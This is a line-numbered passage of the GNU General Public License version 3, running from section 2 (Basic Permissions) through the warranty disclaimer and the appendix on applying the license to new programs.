150 | 151 | The Corresponding Source for a work in source code form is that 152 | same work. 153 | 154 | 2. Basic Permissions. 155 | 156 | All rights granted under this License are granted for the term of 157 | copyright on the Program, and are irrevocable provided the stated 158 | conditions are met. This License explicitly affirms your unlimited 159 | permission to run the unmodified Program. The output from running a 160 | covered work is covered by this License only if the output, given its 161 | content, constitutes a covered work. This License acknowledges your 162 | rights of fair use or other equivalent, as provided by copyright law. 163 | 164 | You may make, run and propagate covered works that you do not 165 | convey, without conditions so long as your license otherwise remains 166 | in force. You may convey covered works to others for the sole purpose 167 | of having them make modifications exclusively for you, or provide you 168 | with facilities for running those works, provided that you comply with 169 | the terms of this License in conveying all material for which you do 170 | not control copyright. Those thus making or running the covered works 171 | for you must do so exclusively on your behalf, under your direction 172 | and control, on terms that prohibit them from making any copies of 173 | your copyrighted material outside their relationship with you. 174 | 175 | Conveying under any other circumstances is permitted solely under 176 | the conditions stated below. Sublicensing is not allowed; section 10 177 | makes it unnecessary. 178 | 179 | 3. Protecting Users' Legal Rights From Anti-Circumvention Law. 180 | 181 | No covered work shall be deemed part of an effective technological 182 | measure under any applicable law fulfilling obligations under article 183 | 11 of the WIPO copyright treaty adopted on 20 December 1996, or 184 | similar laws prohibiting or restricting circumvention of such 185 | measures. 186 | 187 | When you convey a covered work, you waive any legal power to forbid 188 | circumvention of technological measures to the extent such circumvention 189 | is effected by exercising rights under this License with respect to 190 | the covered work, and you disclaim any intention to limit operation or 191 | modification of the work as a means of enforcing, against the work's 192 | users, your or third parties' legal rights to forbid circumvention of 193 | technological measures. 194 | 195 | 4. Conveying Verbatim Copies. 196 | 197 | You may convey verbatim copies of the Program's source code as you 198 | receive it, in any medium, provided that you conspicuously and 199 | appropriately publish on each copy an appropriate copyright notice; 200 | keep intact all notices stating that this License and any 201 | non-permissive terms added in accord with section 7 apply to the code; 202 | keep intact all notices of the absence of any warranty; and give all 203 | recipients a copy of this License along with the Program. 204 | 205 | You may charge any price or no price for each copy that you convey, 206 | and you may offer support or warranty protection for a fee. 207 | 208 | 5. Conveying Modified Source Versions. 209 | 210 | You may convey a work based on the Program, or the modifications to 211 | produce it from the Program, in the form of source code under the 212 | terms of section 4, provided that you also meet all of these conditions: 213 | 214 | a) The work must carry prominent notices stating that you modified 215 | it, and giving a relevant date. 216 | 217 | b) The work must carry prominent notices stating that it is 218 | released under this License and any conditions added under section 219 | 7. This requirement modifies the requirement in section 4 to 220 | "keep intact all notices". 221 | 222 | c) You must license the entire work, as a whole, under this 223 | License to anyone who comes into possession of a copy. This 224 | License will therefore apply, along with any applicable section 7 225 | additional terms, to the whole of the work, and all its parts, 226 | regardless of how they are packaged. This License gives no 227 | permission to license the work in any other way, but it does not 228 | invalidate such permission if you have separately received it. 229 | 230 | d) If the work has interactive user interfaces, each must display 231 | Appropriate Legal Notices; however, if the Program has interactive 232 | interfaces that do not display Appropriate Legal Notices, your 233 | work need not make them do so. 234 | 235 | A compilation of a covered work with other separate and independent 236 | works, which are not by their nature extensions of the covered work, 237 | and which are not combined with it such as to form a larger program, 238 | in or on a volume of a storage or distribution medium, is called an 239 | "aggregate" if the compilation and its resulting copyright are not 240 | used to limit the access or legal rights of the compilation's users 241 | beyond what the individual works permit. Inclusion of a covered work 242 | in an aggregate does not cause this License to apply to the other 243 | parts of the aggregate. 244 | 245 | 6. Conveying Non-Source Forms. 246 | 247 | You may convey a covered work in object code form under the terms 248 | of sections 4 and 5, provided that you also convey the 249 | machine-readable Corresponding Source under the terms of this License, 250 | in one of these ways: 251 | 252 | a) Convey the object code in, or embodied in, a physical product 253 | (including a physical distribution medium), accompanied by the 254 | Corresponding Source fixed on a durable physical medium 255 | customarily used for software interchange. 256 | 257 | b) Convey the object code in, or embodied in, a physical product 258 | (including a physical distribution medium), accompanied by a 259 | written offer, valid for at least three years and valid for as 260 | long as you offer spare parts or customer support for that product 261 | model, to give anyone who possesses the object code either (1) a 262 | copy of the Corresponding Source for all the software in the 263 | product that is covered by this License, on a durable physical 264 | medium customarily used for software interchange, for a price no 265 | more than your reasonable cost of physically performing this 266 | conveying of source, or (2) access to copy the 267 | Corresponding Source from a network server at no charge. 268 | 269 | c) Convey individual copies of the object code with a copy of the 270 | written offer to provide the Corresponding Source. This 271 | alternative is allowed only occasionally and noncommercially, and 272 | only if you received the object code with such an offer, in accord 273 | with subsection 6b. 274 | 275 | d) Convey the object code by offering access from a designated 276 | place (gratis or for a charge), and offer equivalent access to the 277 | Corresponding Source in the same way through the same place at no 278 | further charge. You need not require recipients to copy the 279 | Corresponding Source along with the object code. If the place to 280 | copy the object code is a network server, the Corresponding Source 281 | may be on a different server (operated by you or a third party) 282 | that supports equivalent copying facilities, provided you maintain 283 | clear directions next to the object code saying where to find the 284 | Corresponding Source. Regardless of what server hosts the 285 | Corresponding Source, you remain obligated to ensure that it is 286 | available for as long as needed to satisfy these requirements. 287 | 288 | e) Convey the object code using peer-to-peer transmission, provided 289 | you inform other peers where the object code and Corresponding 290 | Source of the work are being offered to the general public at no 291 | charge under subsection 6d. 292 | 293 | A separable portion of the object code, whose source code is excluded 294 | from the Corresponding Source as a System Library, need not be 295 | included in conveying the object code work. 296 | 297 | A "User Product" is either (1) a "consumer product", which means any 298 | tangible personal property which is normally used for personal, family, 299 | or household purposes, or (2) anything designed or sold for incorporation 300 | into a dwelling. In determining whether a product is a consumer product, 301 | doubtful cases shall be resolved in favor of coverage. For a particular 302 | product received by a particular user, "normally used" refers to a 303 | typical or common use of that class of product, regardless of the status 304 | of the particular user or of the way in which the particular user 305 | actually uses, or expects or is expected to use, the product. A product 306 | is a consumer product regardless of whether the product has substantial 307 | commercial, industrial or non-consumer uses, unless such uses represent 308 | the only significant mode of use of the product. 309 | 310 | "Installation Information" for a User Product means any methods, 311 | procedures, authorization keys, or other information required to install 312 | and execute modified versions of a covered work in that User Product from 313 | a modified version of its Corresponding Source. The information must 314 | suffice to ensure that the continued functioning of the modified object 315 | code is in no case prevented or interfered with solely because 316 | modification has been made. 317 | 318 | If you convey an object code work under this section in, or with, or 319 | specifically for use in, a User Product, and the conveying occurs as 320 | part of a transaction in which the right of possession and use of the 321 | User Product is transferred to the recipient in perpetuity or for a 322 | fixed term (regardless of how the transaction is characterized), the 323 | Corresponding Source conveyed under this section must be accompanied 324 | by the Installation Information. But this requirement does not apply 325 | if neither you nor any third party retains the ability to install 326 | modified object code on the User Product (for example, the work has 327 | been installed in ROM). 328 | 329 | The requirement to provide Installation Information does not include a 330 | requirement to continue to provide support service, warranty, or updates 331 | for a work that has been modified or installed by the recipient, or for 332 | the User Product in which it has been modified or installed. Access to a 333 | network may be denied when the modification itself materially and 334 | adversely affects the operation of the network or violates the rules and 335 | protocols for communication across the network. 336 | 337 | Corresponding Source conveyed, and Installation Information provided, 338 | in accord with this section must be in a format that is publicly 339 | documented (and with an implementation available to the public in 340 | source code form), and must require no special password or key for 341 | unpacking, reading or copying. 342 | 343 | 7. Additional Terms. 344 | 345 | "Additional permissions" are terms that supplement the terms of this 346 | License by making exceptions from one or more of its conditions. 347 | Additional permissions that are applicable to the entire Program shall 348 | be treated as though they were included in this License, to the extent 349 | that they are valid under applicable law. If additional permissions 350 | apply only to part of the Program, that part may be used separately 351 | under those permissions, but the entire Program remains governed by 352 | this License without regard to the additional permissions. 353 | 354 | When you convey a copy of a covered work, you may at your option 355 | remove any additional permissions from that copy, or from any part of 356 | it. (Additional permissions may be written to require their own 357 | removal in certain cases when you modify the work.) You may place 358 | additional permissions on material, added by you to a covered work, 359 | for which you have or can give appropriate copyright permission. 360 | 361 | Notwithstanding any other provision of this License, for material you 362 | add to a covered work, you may (if authorized by the copyright holders of 363 | that material) supplement the terms of this License with terms: 364 | 365 | a) Disclaiming warranty or limiting liability differently from the 366 | terms of sections 15 and 16 of this License; or 367 | 368 | b) Requiring preservation of specified reasonable legal notices or 369 | author attributions in that material or in the Appropriate Legal 370 | Notices displayed by works containing it; or 371 | 372 | c) Prohibiting misrepresentation of the origin of that material, or 373 | requiring that modified versions of such material be marked in 374 | reasonable ways as different from the original version; or 375 | 376 | d) Limiting the use for publicity purposes of names of licensors or 377 | authors of the material; or 378 | 379 | e) Declining to grant rights under trademark law for use of some 380 | trade names, trademarks, or service marks; or 381 | 382 | f) Requiring indemnification of licensors and authors of that 383 | material by anyone who conveys the material (or modified versions of 384 | it) with contractual assumptions of liability to the recipient, for 385 | any liability that these contractual assumptions directly impose on 386 | those licensors and authors. 387 | 388 | All other non-permissive additional terms are considered "further 389 | restrictions" within the meaning of section 10. If the Program as you 390 | received it, or any part of it, contains a notice stating that it is 391 | governed by this License along with a term that is a further 392 | restriction, you may remove that term. If a license document contains 393 | a further restriction but permits relicensing or conveying under this 394 | License, you may add to a covered work material governed by the terms 395 | of that license document, provided that the further restriction does 396 | not survive such relicensing or conveying. 397 | 398 | If you add terms to a covered work in accord with this section, you 399 | must place, in the relevant source files, a statement of the 400 | additional terms that apply to those files, or a notice indicating 401 | where to find the applicable terms. 402 | 403 | Additional terms, permissive or non-permissive, may be stated in the 404 | form of a separately written license, or stated as exceptions; 405 | the above requirements apply either way. 406 | 407 | 8. Termination. 408 | 409 | You may not propagate or modify a covered work except as expressly 410 | provided under this License. Any attempt otherwise to propagate or 411 | modify it is void, and will automatically terminate your rights under 412 | this License (including any patent licenses granted under the third 413 | paragraph of section 11). 414 | 415 | However, if you cease all violation of this License, then your 416 | license from a particular copyright holder is reinstated (a) 417 | provisionally, unless and until the copyright holder explicitly and 418 | finally terminates your license, and (b) permanently, if the copyright 419 | holder fails to notify you of the violation by some reasonable means 420 | prior to 60 days after the cessation. 421 | 422 | Moreover, your license from a particular copyright holder is 423 | reinstated permanently if the copyright holder notifies you of the 424 | violation by some reasonable means, this is the first time you have 425 | received notice of violation of this License (for any work) from that 426 | copyright holder, and you cure the violation prior to 30 days after 427 | your receipt of the notice. 428 | 429 | Termination of your rights under this section does not terminate the 430 | licenses of parties who have received copies or rights from you under 431 | this License. If your rights have been terminated and not permanently 432 | reinstated, you do not qualify to receive new licenses for the same 433 | material under section 10. 434 | 435 | 9. Acceptance Not Required for Having Copies. 436 | 437 | You are not required to accept this License in order to receive or 438 | run a copy of the Program. Ancillary propagation of a covered work 439 | occurring solely as a consequence of using peer-to-peer transmission 440 | to receive a copy likewise does not require acceptance. However, 441 | nothing other than this License grants you permission to propagate or 442 | modify any covered work. These actions infringe copyright if you do 443 | not accept this License. Therefore, by modifying or propagating a 444 | covered work, you indicate your acceptance of this License to do so. 445 | 446 | 10. Automatic Licensing of Downstream Recipients. 447 | 448 | Each time you convey a covered work, the recipient automatically 449 | receives a license from the original licensors, to run, modify and 450 | propagate that work, subject to this License. You are not responsible 451 | for enforcing compliance by third parties with this License. 452 | 453 | An "entity transaction" is a transaction transferring control of an 454 | organization, or substantially all assets of one, or subdividing an 455 | organization, or merging organizations. If propagation of a covered 456 | work results from an entity transaction, each party to that 457 | transaction who receives a copy of the work also receives whatever 458 | licenses to the work the party's predecessor in interest had or could 459 | give under the previous paragraph, plus a right to possession of the 460 | Corresponding Source of the work from the predecessor in interest, if 461 | the predecessor has it or can get it with reasonable efforts. 462 | 463 | You may not impose any further restrictions on the exercise of the 464 | rights granted or affirmed under this License. For example, you may 465 | not impose a license fee, royalty, or other charge for exercise of 466 | rights granted under this License, and you may not initiate litigation 467 | (including a cross-claim or counterclaim in a lawsuit) alleging that 468 | any patent claim is infringed by making, using, selling, offering for 469 | sale, or importing the Program or any portion of it. 470 | 471 | 11. Patents. 472 | 473 | A "contributor" is a copyright holder who authorizes use under this 474 | License of the Program or a work on which the Program is based. The 475 | work thus licensed is called the contributor's "contributor version". 476 | 477 | A contributor's "essential patent claims" are all patent claims 478 | owned or controlled by the contributor, whether already acquired or 479 | hereafter acquired, that would be infringed by some manner, permitted 480 | by this License, of making, using, or selling its contributor version, 481 | but do not include claims that would be infringed only as a 482 | consequence of further modification of the contributor version. For 483 | purposes of this definition, "control" includes the right to grant 484 | patent sublicenses in a manner consistent with the requirements of 485 | this License. 486 | 487 | Each contributor grants you a non-exclusive, worldwide, royalty-free 488 | patent license under the contributor's essential patent claims, to 489 | make, use, sell, offer for sale, import and otherwise run, modify and 490 | propagate the contents of its contributor version. 491 | 492 | In the following three paragraphs, a "patent license" is any express 493 | agreement or commitment, however denominated, not to enforce a patent 494 | (such as an express permission to practice a patent or covenant not to 495 | sue for patent infringement). To "grant" such a patent license to a 496 | party means to make such an agreement or commitment not to enforce a 497 | patent against the party. 498 | 499 | If you convey a covered work, knowingly relying on a patent license, 500 | and the Corresponding Source of the work is not available for anyone 501 | to copy, free of charge and under the terms of this License, through a 502 | publicly available network server or other readily accessible means, 503 | then you must either (1) cause the Corresponding Source to be so 504 | available, or (2) arrange to deprive yourself of the benefit of the 505 | patent license for this particular work, or (3) arrange, in a manner 506 | consistent with the requirements of this License, to extend the patent 507 | license to downstream recipients. "Knowingly relying" means you have 508 | actual knowledge that, but for the patent license, your conveying the 509 | covered work in a country, or your recipient's use of the covered work 510 | in a country, would infringe one or more identifiable patents in that 511 | country that you have reason to believe are valid. 512 | 513 | If, pursuant to or in connection with a single transaction or 514 | arrangement, you convey, or propagate by procuring conveyance of, a 515 | covered work, and grant a patent license to some of the parties 516 | receiving the covered work authorizing them to use, propagate, modify 517 | or convey a specific copy of the covered work, then the patent license 518 | you grant is automatically extended to all recipients of the covered 519 | work and works based on it. 520 | 521 | A patent license is "discriminatory" if it does not include within 522 | the scope of its coverage, prohibits the exercise of, or is 523 | conditioned on the non-exercise of one or more of the rights that are 524 | specifically granted under this License. You may not convey a covered 525 | work if you are a party to an arrangement with a third party that is 526 | in the business of distributing software, under which you make payment 527 | to the third party based on the extent of your activity of conveying 528 | the work, and under which the third party grants, to any of the 529 | parties who would receive the covered work from you, a discriminatory 530 | patent license (a) in connection with copies of the covered work 531 | conveyed by you (or copies made from those copies), or (b) primarily 532 | for and in connection with specific products or compilations that 533 | contain the covered work, unless you entered into that arrangement, 534 | or that patent license was granted, prior to 28 March 2007. 535 | 536 | Nothing in this License shall be construed as excluding or limiting 537 | any implied license or other defenses to infringement that may 538 | otherwise be available to you under applicable patent law. 539 | 540 | 12. No Surrender of Others' Freedom. 541 | 542 | If conditions are imposed on you (whether by court order, agreement or 543 | otherwise) that contradict the conditions of this License, they do not 544 | excuse you from the conditions of this License. If you cannot convey a 545 | covered work so as to satisfy simultaneously your obligations under this 546 | License and any other pertinent obligations, then as a consequence you may 547 | not convey it at all. For example, if you agree to terms that obligate you 548 | to collect a royalty for further conveying from those to whom you convey 549 | the Program, the only way you could satisfy both those terms and this 550 | License would be to refrain entirely from conveying the Program. 551 | 552 | 13. Use with the GNU Affero General Public License. 553 | 554 | Notwithstanding any other provision of this License, you have 555 | permission to link or combine any covered work with a work licensed 556 | under version 3 of the GNU Affero General Public License into a single 557 | combined work, and to convey the resulting work. The terms of this 558 | License will continue to apply to the part which is the covered work, 559 | but the special requirements of the GNU Affero General Public License, 560 | section 13, concerning interaction through a network will apply to the 561 | combination as such. 562 | 563 | 14. Revised Versions of this License. 564 | 565 | The Free Software Foundation may publish revised and/or new versions of 566 | the GNU General Public License from time to time. Such new versions will 567 | be similar in spirit to the present version, but may differ in detail to 568 | address new problems or concerns. 569 | 570 | Each version is given a distinguishing version number. If the 571 | Program specifies that a certain numbered version of the GNU General 572 | Public License "or any later version" applies to it, you have the 573 | option of following the terms and conditions either of that numbered 574 | version or of any later version published by the Free Software 575 | Foundation. If the Program does not specify a version number of the 576 | GNU General Public License, you may choose any version ever published 577 | by the Free Software Foundation. 578 | 579 | If the Program specifies that a proxy can decide which future 580 | versions of the GNU General Public License can be used, that proxy's 581 | public statement of acceptance of a version permanently authorizes you 582 | to choose that version for the Program. 583 | 584 | Later license versions may give you additional or different 585 | permissions. However, no additional obligations are imposed on any 586 | author or copyright holder as a result of your choosing to follow a 587 | later version. 588 | 589 | 15. Disclaimer of Warranty. 590 | 591 | THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY 592 | APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT 593 | HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY 594 | OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, 595 | THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 596 | PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM 597 | IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF 598 | ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 599 | 600 | 16. Limitation of Liability. 601 | 602 | IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING 603 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS 604 | THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY 605 | GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE 606 | USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF 607 | DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD 608 | PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), 609 | EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF 610 | SUCH DAMAGES. 611 | 612 | 17. Interpretation of Sections 15 and 16. 613 | 614 | If the disclaimer of warranty and limitation of liability provided 615 | above cannot be given local legal effect according to their terms, 616 | reviewing courts shall apply local law that most closely approximates 617 | an absolute waiver of all civil liability in connection with the 618 | Program, unless a warranty or assumption of liability accompanies a 619 | copy of the Program in return for a fee. 620 | 621 | END OF TERMS AND CONDITIONS 622 | 623 | How to Apply These Terms to Your New Programs 624 | 625 | If you develop a new program, and you want it to be of the greatest 626 | possible use to the public, the best way to achieve this is to make it 627 | free software which everyone can redistribute and change under these terms. 628 | 629 | To do so, attach the following notices to the program. It is safest 630 | to attach them to the start of each source file to most effectively 631 | state the exclusion of warranty; and each file should have at least 632 | the "copyright" line and a pointer to where the full notice is found. 633 | 634 | 635 | Copyright (C) 636 | 637 | This program is free software: you can redistribute it and/or modify 638 | it under the terms of the GNU General Public License as published by 639 | the Free Software Foundation, either version 3 of the License, or 640 | (at your option) any later version. 641 | 642 | This program is distributed in the hope that it will be useful, 643 | but WITHOUT ANY WARRANTY; without even the implied warranty of 644 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 645 | GNU General Public License for more details. 646 | 647 | You should have received a copy of the GNU General Public License 648 | along with this program. If not, see . 649 | 650 | Also add information on how to contact you by electronic and paper mail. 651 | 652 | If the program does terminal interaction, make it output a short 653 | notice like this when it starts in an interactive mode: 654 | 655 | Copyright (C) 656 | This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. 657 | This is free software, and you are welcome to redistribute it 658 | under certain conditions; type `show c' for details. 659 | 660 | The hypothetical commands `show w' and `show c' should show the appropriate 661 | parts of the General Public License. Of course, your program's commands 662 | might be different; for a GUI interface, you would use an "about box". 663 | 664 | You should also get your employer (if you work as a programmer) or school, 665 | if any, to sign a "copyright disclaimer" for the program, if necessary. 666 | For more information on this, and how to apply and follow the GNU GPL, see 667 | . 668 | 669 | The GNU General Public License does not permit incorporating your program 670 | into proprietary programs. If your program is a subroutine library, you 671 | may consider it more useful to permit linking proprietary applications with 672 | the library. If this is what you want to do, use the GNU Lesser General 673 | Public License instead of this License. But first, please read 674 | . 675 | --------------------------------------------------------------------------------